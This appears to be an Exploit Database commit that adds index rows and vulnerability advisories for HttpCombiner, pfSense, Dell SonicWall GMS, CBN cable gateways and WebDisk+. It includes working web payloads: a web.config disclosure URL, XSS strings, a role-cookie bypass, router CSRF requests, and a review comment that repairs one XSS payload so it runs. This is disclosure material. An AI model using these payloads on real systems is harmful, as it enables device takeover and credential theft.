Updated 10_29_2014

This commit is contained in:
Offensive Security 2014-10-29 04:45:11 +00:00
parent 09774073e6
commit 1709d70e04
26 changed files with 2081 additions and 0 deletions


@ -31149,6 +31149,7 @@ id,file,description,date,author,platform,type,port
34588,platforms/aix/dos/34588.txt,"PHP Stock Management System 1.02 - Multiple Vulnerabilty",2014-09-09,jsass,aix,dos,0
34589,platforms/php/webapps/34589.txt,"Wordpress WP Support Plus Responsive Ticket System 2.0 Plugin - Multiple Vulnerabilities",2014-09-09,"Fikri Fadzil",php,webapps,0
34592,platforms/linux/shellcode/34592.c,"Obfuscated Shellcode Linux x86 - chmod 777 (/etc/passwd + /etc/shadow) & Add New Root User & Execute /bin/bash",2014-09-09,"Ali Razmjoo",linux,shellcode,0
34593,platforms/php/webapps/34593.txt,"Parallels Plesk Sitebuilder 9.5 - Multiple Vulnerabilities",2014-09-09,alieye,php,webapps,0
34594,platforms/windows/remote/34594.rb,"ManageEngine Desktop Central StatusUpdate Arbitrary File Upload",2014-09-09,metasploit,windows,remote,8020
34595,platforms/linux/remote/34595.py,"ALCASAR 2.8 Remote Root Code Execution Vulnerability",2014-09-09,eF,linux,remote,80
34596,platforms/php/webapps/34596.txt,"Pligg CMS 1.0.4 SQL Injection and Cross Site Scripting Vulnerabilities",2010-09-03,"Bogdan Calin",php,webapps,0
@ -31197,6 +31198,7 @@ id,file,description,date,author,platform,type,port
34644,platforms/php/webapps/34644.txt,"Silurus Classifieds wcategory.php ID Parameter XSS",2009-08-06,Moudi,php,webapps,0
34645,platforms/php/webapps/34645.txt,"Silurus Classifieds search.php keywords Parameter XSS",2009-08-06,Moudi,php,webapps,0
34646,platforms/php/webapps/34646.txt,"Blog Ink (Blink) Multiple SQL Injection Vulnerabilities",2009-08-03,Drosophila,php,webapps,0
34647,platforms/windows/remote/34647.txt,"Ammyy Admin 3.5 - RCE",2014-09-13,scriptjunkie,windows,remote,0
34648,platforms/windows/local/34648.txt,"Comodo Internet Security - HIPS/Sandbox Escape PoC",2014-09-13,"Joxean Koret",windows,local,0
34649,platforms/php/webapps/34649.txt,"Netautor Professional 5.5 'login2.php' Cross Site Scripting Vulnerability",2010-09-17,"Gjoko Krstic",php,webapps,0
34650,platforms/php/webapps/34650.txt,"e-Soft24 Flash Games Script 1.0 Cross Site Scripting Vulnerability",2009-08-30,"599eme Man",php,webapps,0
@ -31264,6 +31266,7 @@ id,file,description,date,author,platform,type,port
34713,platforms/php/webapps/34713.txt,"Freelancers placebid.php id Parameter XSS",2009-08-17,Moudi,php,webapps,0
34714,platforms/php/webapps/34714.txt,"Freelancers post_resume.php jobid Parameter XSS",2009-08-17,Moudi,php,webapps,0
34715,platforms/php/webapps/34715.txt,"AdQuick 'account.php' Cross Site Scripting Vulnerability",2009-07-20,Moudi,php,webapps,0
34717,platforms/php/webapps/34717.txt,"vBulletin 4.x Verify Email Before Registration Plugin - SQL Injection",2014-09-20,Dave,php,webapps,0
34718,platforms/php/webapps/34718.txt,"M/Monit 3.3.2 - CSRF Vulnerability",2014-09-20,"Dolev Farhi",php,webapps,0
34720,platforms/windows/dos/34720.pl,"Fast Image Resizer 098 - Local Crash Poc",2014-09-20,"niko sec",windows,dos,0
34721,platforms/php/webapps/34721.txt,"Livefyre LiveComments Plugin - Stored XSS",2014-09-20,"Brij Kishore Mishra",php,webapps,0
@ -31446,6 +31449,7 @@ id,file,description,date,author,platform,type,port
34917,platforms/multiple/webapps/34917.txt,"IBM Tivoli Access Manager for e-business ibm/wpm/webseal method Parameter XSS",2010-10-22,IBM,multiple,webapps,0
34918,platforms/cgi/webapps/34918.txt,"Ultra Electronics 7.2.0.19 and 7.4.0.7 - Multiple Vulnerabilities",2014-10-06,"OSI Security",cgi,webapps,443
34919,platforms/php/webapps/34919.txt,"SkyBlueCanvas 1.1 r237 'admin.php' Directory Traversal Vulnerability",2009-07-16,MaXe,php,webapps,0
34920,platforms/asp/webapps/34920.txt,"HttpCombiner ASP.NET - Remote File Disclosure Vulnerability",2014-10-07,"Le Ngoc Son",asp,webapps,0
34921,platforms/windows/local/34921.pl,"Asx to Mp3 2.7.5 - Stack Overflow",2014-10-07,"Amir Tavakolian",windows,local,0
34922,platforms/php/webapps/34922.txt,"Creative Contact Form - Arbitrary File Upload",2014-10-08,"Gianni Angelozzi",php,webapps,0
34923,platforms/linux/local/34923.c,"Linux Kernel 3.16.1 - Remount FUSE Exploit",2014-10-09,"Andy Lutomirski",linux,local,0
@ -31485,6 +31489,7 @@ id,file,description,date,author,platform,type,port
34957,platforms/ios/webapps/34957.txt,"PayPal Inc BB #85 MB iOS 4.6 - Auth Bypass Vulnerability",2014-10-14,Vulnerability-Lab,ios,webapps,0
34958,platforms/php/webapps/34958.py,"Croogo 2.0.0 - Arbitrary PHP Code Execution Exploit",2014-10-14,LiquidWorm,php,webapps,0
34959,platforms/php/webapps/34959.txt,"Croogo 2.0.0 - Multiple Stored XSS Vulnerabilities",2014-10-14,LiquidWorm,php,webapps,0
34965,platforms/php/webapps/34965.txt,"Change CMS 3.6.8 - Multiple CSRF Vulnerabilities",2014-10-14,"Krusty Hack",php,webapps,0
34966,platforms/windows/local/34966.txt,"Telefonica O2 Connection Manager 3.4 - Local Privilege Escalation Vulnerability",2014-10-14,LiquidWorm,windows,local,0
34967,platforms/windows/local/34967.txt,"Telefonica O2 Connection Manager 8.7 - Service Trusted Path Privilege Escalation",2014-10-14,LiquidWorm,windows,local,0
34968,platforms/php/webapps/34968.txt,"YourMembers Plugin - Blind SQL Injection",2014-10-14,TranDinhTien,php,webapps,0
@ -31560,6 +31565,8 @@ id,file,description,date,author,platform,type,port
35043,platforms/php/webapps/35043.txt,"Contenido CMS 4.8.12 Multiple Cross Site Scripting Vulnerabilities",2010-12-02,"High-Tech Bridge SA",php,webapps,0
35044,platforms/php/webapps/35044.txt,"Alguest 1.1 Multiple Cookie Authentication Bypass Vulnerabilities",2010-12-03,"Aliaksandr Hartsuyeu",php,webapps,0
35045,platforms/asp/webapps/35045.txt,"DotNetNuke 5.5.1 'InstallWizard.aspx' Cross Site Scripting Vulnerability",2010-12-03,"Richard Brain",asp,webapps,0
35046,platforms/php/webapps/35046.txt,"Axway Secure Transport 5.1 SP2 - Arbitary File Upload via CSRF",2014-10-23,"Emmanuel Law",php,webapps,0
35047,platforms/hardware/webapps/35047.txt,"Dell SonicWall GMS 7.2.x - Code Injection",2014-10-23,Vulnerability-Lab,hardware,webapps,0
35048,platforms/asp/webapps/35048.txt,"Techno Dreams Articles & Papers Package 2.0 'ArticlesTablelist.asp' SQL Injection Vulnerability",2010-12-04,R4dc0re,asp,webapps,0
35049,platforms/asp/webapps/35049.txt,"Techno Dreams FAQ Manager Package 1.0 'faqlist.asp' SQL Injection Vulnerability",2010-12-04,R4dc0re,asp,webapps,0
35050,platforms/php/webapps/35050.txt,"Alguest 1.1 'start' Parameter SQL Injection Vulnerability",2010-12-06,"Aliaksandr Hartsuyeu",php,webapps,0
@ -31572,6 +31579,24 @@ id,file,description,date,author,platform,type,port
35059,platforms/ios/webapps/35059.txt,"File Manager 4.2.10 iOS - Code Execution Vulnerability",2014-10-25,Vulnerability-Lab,ios,webapps,0
35060,platforms/php/webapps/35060.txt,"Aigaion 1.3.4 'ID' Parameter SQL Injection Vulnerability",2010-12-07,KnocKout,php,webapps,0
35061,platforms/linux/dos/35061.c,"GNU glibc 'regcomp()' Stack Exhaustion Denial Of Service Vulnerability",2010-12-07,"Maksymilian Arciemowicz",linux,dos,0
35062,platforms/multiple/remote/35062.txt,"RDM Embedded Lock Manager < 9.x - 'lm_tcp' Service Buffer Overflow Vulnerability",2010-12-07,"Luigi Auriemma",multiple,remote,0
35063,platforms/php/webapps/35063.txt,"Zimplit CMS zimplit.php file Parameter XSS",2010-12-07,"High-Tech Bridge SA",php,webapps,0
35064,platforms/php/webapps/35064.txt,"Zimplit CMS English_manual_version_2.php client Parameter XSS",2010-12-07,"High-Tech Bridge SA",php,webapps,0
35065,platforms/asp/webapps/35065.txt,"SolarWinds Orion Network Performance Monitor (NPM) 10.1 Multiple Cross Site Scripting Vulnerabilities",2010-12-07,x0skel,asp,webapps,0
35066,platforms/php/webapps/35066.txt,"WordPress Processing Embed Plugin 0.5 'pluginurl' Parameter Cross Site Scripting Vulnerability",2010-12-08,"John Leitch",php,webapps,0
35067,platforms/php/webapps/35067.txt,"WordPress Safe Search Plugin 'v1' Parameter Cross Site Scripting Vulnerability",2010-12-08,"John Leitch",php,webapps,0
35068,platforms/hardware/remote/35068.txt,"pfSense pkg_edit.php id Parameter XSS",2010-11-08,"dave b",hardware,remote,0
35069,platforms/hardware/remote/35069.txt,"pfSense pkg.php xml Parameter XSS",2010-11-08,"dave b",hardware,remote,0
35070,platforms/hardware/remote/35070.txt,"pfSense status_graph.php if Parameter XSS",2010-11-08,"dave b",hardware,remote,0
35071,platforms/hardware/remote/35071.txt,"pfSense interfaces.php if Parameter XSS",2010-11-08,"dave b",hardware,remote,0
35072,platforms/php/webapps/35072.txt,"Drupal Embedded Media Field/Media 6.x : Video Flotsam/Media: Audio Flotsam Multiple Vulnerabilities",2010-12-08,"Justin Klein Keane",php,webapps,0
35073,platforms/php/webapps/35073.txt,"Wordpress CP Multi View Event Calendar 1.01 - SQL Injection",2014-10-27,"Claudio Viviani",php,webapps,80
35074,platforms/windows/local/35074.py,"Free WMA MP3 Converter 1.8 (.wav) - Buffer Overflow",2014-10-27,metacom,windows,local,0
35075,platforms/hardware/webapps/35075.txt,"CBN CH6640E/CG6640E Wireless Gateway Series Multiple Vulnerabilities",2014-10-27,LiquidWorm,hardware,webapps,0
35076,platforms/multiple/webapps/35076.py,"HP Operations Agent Remote XSS iFrame Injection",2014-10-27,"Matt Schmidt",multiple,webapps,383
35078,platforms/unix/remote/35078.rb,"Centreon SQL and Command Injection",2014-10-27,metasploit,unix,remote,80
35079,platforms/jsp/webapps/35079.txt,"Mulesoft ESB Runtime 3.5.1 - Privilege Escalation Vulnerability",2014-10-27,"Brandon Perry",jsp,webapps,8585
35080,platforms/php/webapps/35080.pl,"Incredible PBX 2.0.6.5.0 - Remote Command Execution",2014-10-27,"Simo Ben Youssef",php,webapps,80
35081,platforms/linux/dos/35081.txt,"Binary File Descriptor Library (libbfd) - Out-of-Bounds Crash",2014-10-27,"Michal Zalewski",linux,dos,0
35082,platforms/ios/webapps/35082.txt,"WebDisk+ 2.1 iOS - Code Execution Vulnerability",2014-10-27,Vulnerability-Lab,ios,webapps,1861
35083,platforms/ios/webapps/35083.txt,"Folder Plus 2.5.1 iOS - Persistent XSS Vulnerability",2014-10-27,Vulnerability-Lab,ios,webapps,0
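Review bot: The 34920 row credits "Le Ngoc Son" with date 2014-10-07, while the added file itself carries `# Exploit Author: Hoang Anh Thai` and `# Date: 2014-10-10`; the index and the advisory should agree, and the row is the easier place to correct once the true author is confirmed. The 35047 row describes the SonicWall GMS issue as "Code Injection", but the advisory it points to is titled "Persistent Web Vulnerability" and describes stored script/HTML injection into notification mails, so `"Dell SonicWall GMS 7.2.x - Persistent XSS in Mail Notifications"` would describe the file without overstating it. The four pfSense rows (35068–35071) are filed as hardware/remote although each is a reflected XSS against the web GUI; if the type column is meant to capture exploit class, webapps seems the better fit, though the repository's convention for appliance GUIs is not visible here.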


39
platforms/asp/webapps/34920.txt Executable file

@ -0,0 +1,39 @@
# Exploit Title: HttpCombiner ASP.NET Remote File Disclosure Vulnerability
# Google Dork: [filetype:txt intext:HttpCombiner.ashx]
# Date: 2014-10-10
# Exploit Author: Hoang Anh Thai
# Vendor Homepage: https://myfirstsamplepagebyilyasforassign.googlecode.com/files/HttpCombiner-v1.zip
# Reference: http://www.codeproject.com/KB/aspnet/HttpCombine.aspx
# Affected Versions: HttpCombiner v1.0
# Tested on: Windows 7 / Chrome & Internet Explorer
Description:
============
An HTTP handler that combines multiple CSS, Javascript or URL into one response for faster page load. It can combine, compress and cache response which results in faster page load and better scalability of web application
It's a good practice to use many small Javascript and CSS files instead of one large Javascript/CSS file for better code maintainability, but bad in terms of website performance. Although you should write your Javascript code in small files and break large CSS files into small chunks but when browser requests those javascript and css files, it makes one Http request per file. Every Http Request results in a network roundtrip form your browser to the server and the delay in reaching the server and coming back to the browser is called latency. So, if you have four javascripts and three css files loaded by a page, you are wasting time in seven network roundtrips. Within USA, latency is average 70ms. So, you waste 7x70 = 490ms, about half a second of delay. Outside USA, average latency is around 200ms. So, that means 1400ms of waiting. Browser cannot show the page properly until Css and Javascripts are fully loaded. So, the more latency you have, the slower page loads.
You can reduce the wait time by using a CDN. Read my previous blog post about using CDN. However, a better solution is to deliver multiple files over one request using an HttpHandler that combines several files and delivers as one output. So, instead of putting many <script> or <link> tag, you just put one <script> and one <link> tag, and point them to the HttpHandler. You tell the handler which files to combine and it delivers those files in one response. This saves browser from making many requests and eliminates the latency.
This Http Handler reads the file names defined in a configuration and combines all those files and delivers as one response. It delivers the response as gzip compressed to save bandwidth. Moreover, it generates proper cache header to cache the response in browser cache, so that, browser does not request it again on future visit.
PoC:
===
Google search: [inurl:robots.txt intext:HttpCombiner.ashx]
Result: The robots.txt file contains information "...Disallow: /css/HttpCombiner.ashx..."
Exploit view source web.config: http://[host]/css/HttpCombiner.ashx?s=~/web.config&t=text/xml
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: securitydaily.net
CONTACT: whitehat@hotmail.com
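Review bot: The PoC `http://[host]/css/HttpCombiner.ashx?s=~/web.config&t=text/xml` shows the disclosure but the advisory never states the root cause or a mitigation, so a reader cannot tell which deployments are exposed or how to fix them. From the request it appears the handler resolves the `s` parameter as an application-relative (`~/`) path and returns whatever it maps to instead of restricting `s` to the file sets named in configuration; I would add under Description a note along the lines of `Root cause (inferred from the PoC): the 's' value is mapped to a path under the application root without being checked against the configured sets, so any readable file below the web root - including web.config with connection strings and machineKey - can be fetched; fix by accepting only configured set names and rejecting '~', '/' and '\' in 's'.` The `# Exploit Author` and `# Date` lines disagree with the files.csv row for 34920 (Le Ngoc Son, 2014-10-07), and the trailing `VULNERABILITY LABORATORY RESEARCH TEAM` footer with a hotmail contact reads as a template left over from another advisory; one attribution should be chosen and the footer dropped or corrected. The dork `inurl:robots.txt intext:HttpCombiner.ashx` only finds sites that advertise the handler in robots.txt, so absence there says nothing about whether a site is affected.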


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/45272/info
pfSense is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
pfSense 2 Beta 4 is vulnerable; other versions may also be affected.
https://www.example.com/pkg_edit.php?xml=olsrd.xml&id=%22/%3E%3Cscript%3Ealert%282%29;%3C/script%3E


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/45272/info
pfSense is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
pfSense 2 Beta 4 is vulnerable; other versions may also be affected.
https://www.example.com/pkg.php?xml=jailctl.xm%27l%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/45272/info
pfSense is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
pfSense 2 Beta 4 is vulnerable; other versions may also be affected.
https://www.example.com/status_graph.php?if=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/45272/info
pfSense is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
pfSense 2 Beta 4 is vulnerable; other versions may also be affected.
https://www.example.com/interfaces.php?if=wan%22%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E


@ -0,0 +1,199 @@
Document Title:
===============
Dell SonicWall GMS v7.2.x - Persistent Web Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1222
Release Date:
=============
2014-10-21
Vulnerability Laboratory ID (VL-ID):
====================================
1222
Common Vulnerability Scoring System:
====================================
3
Product & Service Introduction:
===============================
Dell SonicWALL`s management and reporting solutions provide a comprehensive architecture for centrally creating and managing
security policies, providing real-time monitoring and alerts, and delivering intuitive compliance and usage reports, all from
a single management interface. Whether your organization is a small- or medium-sized business, a distributed enterprise or a
managed service provider, Dell™ SonicWALL™ offers software and appliance solutions to meet its needs.
The award-winning Dell SonicWALL Global Management System (GMS) provides organizations, distributed enterprises and service
providers with a flexible, powerful and intuitive solution to centrally manage and rapidly deploy SonicWALL firewall, anti-spam,
backup and recovery, and secure remote access solutions. Flexibly deployed as software, hardware—in the form of the Universal
Management Appliance (UMA)—or a virtual appliance, SonicWALL GMS also provides centralized real-time monitoring and comprehensive
policy and compliance reporting to drive down the cost of owning and managing SonicWALL security appliances. Multiple GMS
software, hardware, and virtual appliance agents, when deployed in a cluster, can scale to manage thousands of SonicWALL
security appliances. This makes GMS an ideal solution for small- to medium-sized businesses, enterprises and managed service
providers that have either single-site or distributed multi-site environments.
(Copy of the Vendor Homepage: http://www.sonicwall.com/emea/en/products/Centralized_Management_Reporting.html )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a persistent validation vulnerability in the official DELL SonicWall GMS v7.2.x appliance web-application.
Vulnerability Disclosure Timeline:
==================================
2014-10-21: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
DELL
Product: SonicWall GMS Networks Appliance Application 7.2
Exploitation Technique:
=======================
Local
Severity Level:
===============
Medium
Technical Details & Description:
================================
A persistent mail encoding web vulnerability has been discovered in the official DELL SonicWall GMS v7.2.x appliance web-application.
The security issue allows remote attackers with low privileged user account to inject own malicious script codes to the application-side
of the vulnerable service module.
The vulnerability is located in the `Console > Management > Settings > GMS Settings` module. Remote attackers and low privileged web-application
user accounts are able to inject own malicious script code context as notification value. The vulnerable user context with log files or information
notification messages (input) will be send to the internal web-server through the firewall. The data of the POST method request in the input, executes
without a secure encoding or a restriction on the input in the web-application appliance. The persistent execution of the script code occurs in the mail
notification that gets send by the appliances directly to users or via the interval count. In case of the second provided scenario the application generated
a pdf report with malicious script code in the mail body message.
The issue impact a risk to the full appliance web-application get compromised beause the send mail notifications is wrong encoded and the internal encode is
broken too. Regular the stored values must be secure encoded and parsed to prevent persistent executions in the appliance mails. The attack vector is persistent
on the application-side of the vulnerable service and the request method to inject the payload is POST.
The security risk of the persistent input validation web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.0.
Exploitation of the vulnerability requires a low privileged application user account and low user interaction. Successful exploitation of the vulnerability results
in session hijacking, persistent phishing attacks, persistent external redirect via mail and persistent manipulation of affected or connected module context.
Vulnerable Module(s):
[+] Console > Management > Settings > GMS Settings
Vulnerable Parameter(s):
[+] message body > table
Affected Service(s):
[+] admin@sonicwall.com (test > livedemo-admin@sonicwall.com)
Note: All other modules sending user values of non restricted input throught the appliance back. (logs, updates ...)
Proof of Concept (PoC):
=======================
The persistent mail encoding web vulnerability can be exploited by remote attackers with low privileged application user account and low user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
Information of requirements:
- The template to send notification alerts needs to be send to the
Default html (example: http://gms.demo.sonicwall.com/sgms/auth > )
- The Console > Management > Settings section needs to be linked to the
appliance demo email address (example: livedemo-admin@sonicwall.com)
- The Alert of the notification with the pdf summery report of the
archiv needs to be redirected to the testmail like in our case
(bkm@evolution-sec.com)
PoC: message body > table
<html>
<head>
<title><iframe src=a>%20<iframe> <iframe src=a>%20<iframe></title>
<link rel="important stylesheet" href="chrome://messagebody/skin/messageBody.css">
</head>
<body>
<table border=0 cellspacing=0 cellpadding=0 width="100%" class="header-part1"><tr><td><b>Betreff: </b><a>%20<x>
<a>%20<x></td></tr><tr><td><b>Von: </b>x@sonicwall.com</td></tr><tr><td><b>Datum: </b>07.03.2014 00:15</td></tr></table>
<table border=0 cellspacing=0 cellpadding=0 width="100%" class="header-part2"><tr><td><b>An: </b>bkm@evolution-sec.com</td></tr></table><br>
<[PERSISTENT INJECTED SCRIPT CODE!]>%20<iframe><br>
<br>
<br>
<br>
Powered by Dell SonicWALL GMS</body>
</html>
Reference(s):
http://gms.localhost:4872/sgms/
http://gms.localhost:4872/sgms/panelManager
http://gms.localhost:4872/sgms/panelManager?panelidz=1
http://gms.localhost:4872/sgms/panelManager?panelidz=1&level=1&typeOfUnits=0#
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure encode and parse of the input values in the message body context
Filter and restrict context of send mails through the application and the web-server of the sonicwall gms appliance.
The issue has already been patched by the dell security team in cooperation with the vulnerability-lab during the year 2014.
Security Risk:
==============
The security risk of the persistent mail encoding and validation web vulnerability is estimated as medium. (CVSS 3.0)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2014 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
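Review bot: `Exploitation Technique: Local` contradicts the rest of the advisory, which repeatedly says the issue is exploitable by remote attackers holding a low-privileged web-GUI account; it should read `Exploitation Technique: Remote (authenticated)`, and the CVSS value `3` sits oddly beside `Severity Level: Medium`, since a 3.0 base score is conventionally rated Low. The Proof of Concept section shows only the rendered notification mail with the payload replaced by `<[PERSISTENT INJECTED SCRIPT CODE!]>`, not the request that plants it; a reproducer needs the POST target under `Console > Management > Settings > GMS Settings`, the parameter name and one concrete payload, which I would add above the HTML dump. Practitioners should also note that script in a mail body is blocked by most mail clients and by PDF rendering, so the realistic impact is HTML/phishing injection and link redirection inside trusted appliance mail rather than session hijacking, unless the same content is re-rendered in the GMS web UI, which the advisory does not say. The fix section states the issue was patched in 2014 without naming a GMS build or knowledge-base reference, so readers cannot verify their exposure; the first fixed 7.2.x build should be named if known.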


@ -0,0 +1,118 @@
?
CBN CH6640E/CG6640E Wireless Gateway Series Multiple Vulnerabilities
Vendor: Compal Broadband Networks (CBN), Inc.
Product web page: http://www.icbn.com.tw
Affected version: Model: CH6640 and CH6640E
Hardware version: 1.0
Firmware version: CH6640-3.5.11.7-NOSH
Boot version: PSPU-Boot(BBU) 1.0.19.25m1-CBN01
DOCSIS mode: DOCSIS 3.0
Summary: The CBN CH6640E/CG6640E Wireless Gateway is designed for your home,
home office, or small business/enterprise. It can be used in households with
one or more computers capable of wireless connectivity for remote access to
the wireless gateway.
Default credentials:
admin/admin - Allow access gateway pages
root/compalbn - Allow access gateway, provisioning pages and provide more
configuration information.
Desc: The CBN modem gateway suffers from multiple vulnerabilities including
authorization bypass information disclosure, stored XSS, CSRF and denial of
service.
Tested on: Compal Broadband Networks, Inc/Linux/2.6.39.3 UPnP/1.1 MiniUPnPd/1.7
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2014-5203
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5203.php
04.10.2014
---
Authorization Bypass Information Disclosure Vulnerability
#########################################################
http://192.168.0.1/xml/CmgwWirelessSecurity.xml
http://192.168.0.1/xml/DocsisConfigFile.xml
http://192.168.0.1/xml/CmgwBasicSetup.xml
http://192.168.0.1/basicDDNS.html
http://192.168.0.1/basicLanUsers.html
http://192.168.0.1:5000/rootDesc.xml
Set cookie: userData to root or admin, reveals additional pages/info.
--
<html>
<body>
<script>
document.cookie="userData=root; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/";
</script>
</body>
</html>
--
Denial of Service (DoS) for all WiFi connected clients (disconnect)
###################################################################
GET http://192.168.0.1/wirelessChannelStatus.html HTTP/1.1
Stored Cross-Site Scripting (XSS) Vulnerability
###############################################
Cookie: userData
Value: hax0r"><script>alert(document.cookie);</script>
--
<html>
<body>
<script>
document.cookie="hax0r"><script>alert(document.cookie);</script>; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/";
</script>
</body>
</html>
--
Cross-Site Request Forgery (CSRF) Vulnerability
###############################################
DDNS config:
------------
GET http://192.168.0.1/basicDDNS.html?DdnsService=1&DdnsUserName=a&DdnsPassword=b&DdnsHostName=c# HTTP/1.1
Change wifi pass:
-----------------
GET http://192.168.0.1/setWirelessSecurity.html?Ssid=0&sMode=7&sbMode=1&encAlgm=3&psKey=NEW_PASSWORD&rekeyInt=0 HTTP/1.1
Add static mac address (static assigned dhcp client):
-----------------------------------------------------
GET http://192.168.0.1/setBasicDHCP1.html?action=add_static&MacAddress=38%3A59%3AF9%3AC3%3AE3%3AEF&LeasedIP=8 HTTP/1.1
Enable/Disable UPnP:
--------------------
GET http://192.168.0.1/setAdvancedOptions.html?action=apply&instance=undefined&UPnP=1 HTTP/1.1 (enable)
GET http://192.168.0.1/setAdvancedOptions.html?action=apply&instance=undefined&UPnP=2 HTTP/1.1 (disable)
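Review bot: The helper page under `Stored Cross-Site Scripting (XSS) Vulnerability` is not runnable as written: `document.cookie="hax0r"><script>...` ends the JavaScript string at the first unescaped `"`, the literal `</script>` inside the inline script closes the script element early, the cookie name `userData` given two lines above is missing, and the `;` in `alert(document.cookie);` terminates the cookie value when it is set through `document.cookie`. A form that survives all four problems is `document.cookie='userData=hax0r"><script>alert(document.cookie)<\/script>; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/';`, or simply send the raw `Cookie: userData=...` header through a proxy, which the `Cookie:`/`Value:` lines already imply. Whether the gateway decodes the cookie before echoing it is not shown, so percent-encoding the value is not a safe alternative. The authorization-bypass section would be clearer with the root cause stated outright, since the stored XSS and the role escalation both hinge on it: `Root cause: the gateway derives the logged-in role from the client-supplied userData cookie with no server-side session check`, hedged as observed behaviour since the firmware source is not available.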

223
platforms/ios/webapps/35082.txt Executable file

@ -0,0 +1,223 @@
Document Title:
===============
WebDisk+ v2.1 iOS - Code Execution Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1349
Release Date:
=============
2014-10-23
Vulnerability Laboratory ID (VL-ID):
====================================
1349
Common Vulnerability Scoring System:
====================================
9.1
Product & Service Introduction:
===============================
WebDisk+ is a Push verion of WebDisk. It have all Full functionality of WebDisk .lets your iphone/ipad become a file website over
wi-fi netwrk.You can upload/download your document to your iphone/ipad on your pc browser over wi-fi. And it is also a document
viewer.let you direct view your document on your iphone/iphone. WebDisk+ can support Upload and download large files (More than 4GB)
form pc or other mobile device.
(Copy of the Vendor Homepage: https://itunes.apple.com/us/app/webdisk+/id606709149 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research team discovered a code execution vulnerability in the official AirPhoto WebDisk+ v2.1 iOS mobile web-application.
Vulnerability Disclosure Timeline:
==================================
2014-10-23: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
AirPhoto
Product: WebDisk+ - iOS Mobile Web Application (Wifi) 2.1
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Critical
Technical Details & Description:
================================
A code execution web vulnerability has been discovered in the official AirPhoto WebDisk+ v2.1 iOS mobile web-application.
The vulnerability allows remote attackers to compromise the application and connected device components by exploitation
of a system specific code execution vulnerability in the wifi interface.
The vulnerability is located in the `name` input field of the wifi web interface upload module (afupload.ma). The function creates
the files without any protection or filter mechanism in the GET method request. Remote attackers are able to manipulate the GET method
request by usage of the `p & filename` parameters in the `afupload.ma` file to compromise the application or device. The execution of
the code occurs in the `afgetdir.ma` file of the wifi interface. The attack vector is located on the application-side of the mobile app
and the request method to inject/execute is GET.
The security risk of the code execution vulnerability is estimated as critical with a cvss (common vulnerability scoring system) count of 9.1.
Exploitation of the code execution vulnerability requires no privileged application user account or user interaction. Successful exploitation
of the code execution vulnerability results in mobile application compromise and affected or connected device component compromise.
Request Method(s):
[+] GET
